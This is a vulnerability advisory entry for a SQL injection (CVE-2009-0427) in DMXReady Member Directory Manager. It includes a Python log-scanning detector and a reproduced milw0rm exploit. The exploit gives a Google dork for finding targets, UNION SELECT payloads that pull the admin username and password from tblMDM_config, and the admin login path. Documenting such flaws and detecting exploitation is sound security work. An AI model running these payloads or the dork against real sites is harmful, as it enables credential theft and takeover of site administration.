DMXReady Member Directory Manager 'upload_image_category.asp' SQL Injection Vulnerability

Vulnerability ID: 1117236    Vulnerability type: SQL injection
Published: 2009-01-14    Updated: 2009-02-04
CVE ID: CVE-2009-0427    CNNVD ID: CNNVD-200902-109
Platform: ASP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/7773
https://www.securityfocus.com/bid/80628
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-109
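|Vulnerability details
Member Directory Manager is member-management software developed by Netkinetic. CategoryManager/upload_image_category.asp in DMXReady Member Directory Manager 1.1 and earlier contains a SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the cid parameter.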
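
An added example, not part of the advisory or the vendor's code: a log check for the affected page that flags any cid value that is not a plain integer. The W3C field layout, the sample log lines and the premise that legitimate cid values are small positive integers are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

# Path suffix of the affected page, taken from the advisory (compared case-insensitively).
TARGET = "/categorymanager/upload_image_category.asp"
# Assumption: a legitimate cid is a small positive integer.
PLAIN_INT = re.compile(r"[0-9]{1,10}")

def suspicious_cid(stem, query):
    """Return decoded cid values that are not plain integers (affected page only)."""
    if not stem.lower().endswith(TARGET):
        return []
    params = parse_qs("" if query == "-" else query, keep_blank_values=True)
    bad = []
    for name, values in params.items():
        if name.lower() == "cid":  # classic ASP parameter names are case-insensitive
            bad += [v for v in values if not PLAIN_INT.fullmatch(v)]
    return bad

def scan(log_lines):
    """Yield (client_ip, cid) for flagged requests in W3C extended log lines."""
    fields = []
    for line in log_lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem, query = row.get("cs-uri-stem", ""), row.get("cs-uri-query", "-")
        for cid in suspicious_cid(stem, query):
            yield row.get("c-ip", "?"), cid

# Constructed sample log (documentation IP ranges, not real traffic).
PAGE = "/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp"
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 6.0",
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    f"2009-01-15 10:02:11 GET {PAGE} cid=12 192.0.2.10 200",
    f"2009-01-15 10:05:42 GET {PAGE} cid=-1+union+select+1,2,3 198.51.100.7 200",
    "2009-01-15 10:06:03 GET /applications/MemberDirectoryManager/inc_memberdirectorymanager.asp id=3 192.0.2.10 200",
    f"2009-01-15 10:07:30 GET {PAGE} CID=7%27 198.51.100.7 500",
]

if __name__ == "__main__":
    for ip, cid in scan(SAMPLE_LOG):
        print(f"non-numeric cid from {ip}: {cid!r}")
```

The same allow-list rule (accept cid only if it parses as an integer) is the input check the page itself would need before the value reaches a query.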
|Exploit
*******************************************************************************
# Title   :  DMXReady Member Directory Manager <= 1.1 SQL Injection Vulnerability
# Author  :  ajann
# Contact :   :( 
# S.Page  :  http://www.dmxready.com
# $$      :  99.97 $
# Dork    :  inurl:inc_memberdirectorymanager.asp
# DorkEx  :
http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_memberdirectorymanager.asp&meta=

****Stop Attack ABD and ISRAEL !


*******************************************************************************

*******************************************************************************

[[SQL]]---------------------------------------------------------

http://[target]/[path]//admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=[SQL Inject]

You Find-> http://[target]/[path]/applications/MemberDirectoryManager/inc_memberdirectorymanager.asp
Edit     -> http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=[SQL Inject]


Example:

USERNAME->
/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_config

PASSWORD->
/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_config

Admin Login->
/admin/MemberDirectoryManager/admin.asp

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# I'm not Hacker!

# milw0rm.com [2009-01-14]
|Affected products
DMXReady Member Directory Manager 1.1
|References

Source: XF
Name: memberdirectory-uploadimage-sql-injection(47960)
Link: http://xforce.iss.net/xforce/xfdb/47960
Source: BID
Name: 33253
Link: http://www.securityfocus.com/bid/33253
Source: SECUNIA
Name: 33482
Link: http://secunia.com/advisories/33482
Source: MILW0RM
Name: 7773
Link: http://milw0rm.com/exploits/7773
Source: dmxready.helpserve.com
Link: http://dmxready.helpserve.com/index.php?_m=news&_a=viewnews&newsid=12
Source: dmxready.helpserve.com
Link: http://dmxready.helpserve.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=93